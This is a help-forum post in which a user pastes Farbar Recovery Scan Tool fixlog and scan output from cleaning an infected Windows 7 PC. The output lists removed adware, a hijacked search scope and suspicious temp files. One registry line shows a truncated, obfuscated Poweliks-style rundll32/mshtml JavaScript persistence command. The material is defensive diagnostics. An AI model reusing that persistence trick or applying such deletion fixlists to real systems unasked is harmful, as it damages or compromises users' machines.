SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
C:\Users\Jude\Documents\SpyHunter-Installer.exe
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys
C:\windows\system32\drivers\hitmanpro37.sys
C:\ProgramData\Sophos
C:\ProgramData\HitmanPro
AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key deleted successfully.
"HKCR\CLSID\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key deleted successfully.
"HKCR\CLSID\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key deleted successfully.
"HKCR\CLSID\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key deleted successfully.
"HKCR\CLSID\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}" => Key deleted successfully.
"HKCR\CLSID\{9030D464-4C02-4ABF-8ECC-5164760863C6}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value deleted successfully.
"HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
SophosVirusRemovalTool => Service deleted successfully.
MFE_RR => Service deleted successfully.
RtsUIR => Service deleted successfully.
USBCCID => Service deleted successfully.
C:\Users\Jude\Documents\SpyHunter-Installer.exe => Moved successfully.

"C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}" directory move:

Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\333c1a3f07c8a" => Scheduled to move on reboot.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\ayookmyii.tmp => Moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\imaeaoyme.tmp => Moved successfully.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\mcquwuiuk.tmp" => Scheduled to move on reboot.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\muiyymeesy.tmp => Moved successfully.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}" directory. => Scheduled to move on reboot.

C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46} => Moved successfully.
C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E} => Moved successfully.
C:\ProgramData\flashax10.exe => Moved successfully.
C:\Users\Jude\gotomypc_540.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\catchme.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\MSN407.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\Refresh.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe => Moved successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}" => Key deleted successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}" => Key deleted successfully.
hitmanpro37 => Service deleted successfully.
C:\windows\system32\drivers\hitmanpro37.sys => Moved successfully.
C:\ProgramData\Sophos => Moved successfully.
C:\ProgramData\HitmanPro => Moved successfully.
C:\Users\Jude\Documents\Grandpa Frank's picture.eml => ":OECustomProperty" ADS removed successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool" => Key deleted successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool" => Key deleted successfully.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-10-28 17:39:55)<=

C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\333c1a3f07c8a => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\mcquwuiuk.tmp => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4} => Is moved successfully.

==== End of Fixlog ====

 

Here's the results of the FRST scan:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 28-10-2014 17:42:56
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SCServer\SCServer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 17:31 - 2014-10-28 17:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-27 05:34 - 2014-10-27 05:34 - 00143944 _____ () C:\windows\Minidump\102714-22557-01.dmp
2014-10-26 21:58 - 2014-10-26 21:58 - 00027025 _____ () C:\Users\Jude\Documents\Addition.txt
2014-10-26 21:56 - 2014-10-28 17:42 - 00015014 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-26 21:56 - 2014-10-26 21:56 - 00000000 ____D () C:\Users\Jude\Documents\FRST-OlderVersion
2014-10-26 17:12 - 2014-10-26 17:12 - 00143944 _____ () C:\windows\Minidump\102614-13400-01.dmp
2014-10-24 20:38 - 2014-10-24 20:38 - 16281688 _____ () C:\Users\Jude\Downloads\RogueKiller.exe
2014-10-24 19:30 - 2014-10-28 17:43 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-26 21:56 - 01104896 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-24 19:39 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:25 - 2014-10-24 19:54 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 20:22 - 2014-10-24 20:39 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-28 17:40 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
